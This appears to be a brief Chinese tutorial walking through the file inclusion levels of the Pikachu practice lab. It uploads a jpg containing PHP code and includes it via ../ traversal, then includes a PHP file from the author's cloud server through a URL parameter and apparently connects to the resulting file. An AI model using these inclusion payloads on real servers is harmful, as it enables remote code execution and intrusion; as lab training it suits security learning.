本文主要是介绍pikachu文件包含漏洞靶场通关攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
本地文件包含
先上传一个jpg文件,内容写上<?php phpinfo();?>
上传成功并且知晓了文件的路径
返回本地上传,并../返回上级目录
可以看到我们的php语句已经生效
远程文件包含
在云服务器上创建一个php文件
然后打开pikachu的远程文件包含靶场,随便选一个提交
在filename处修改为云服务器的目标地址
127.0.0.1/pika/vul/fileinclude/fi_remote.php?filename=http://云服务器IP2.txt&submit=提交查询
可以看到生成的php文件
然后进行连接
这篇关于pikachu文件包含漏洞靶场通关攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!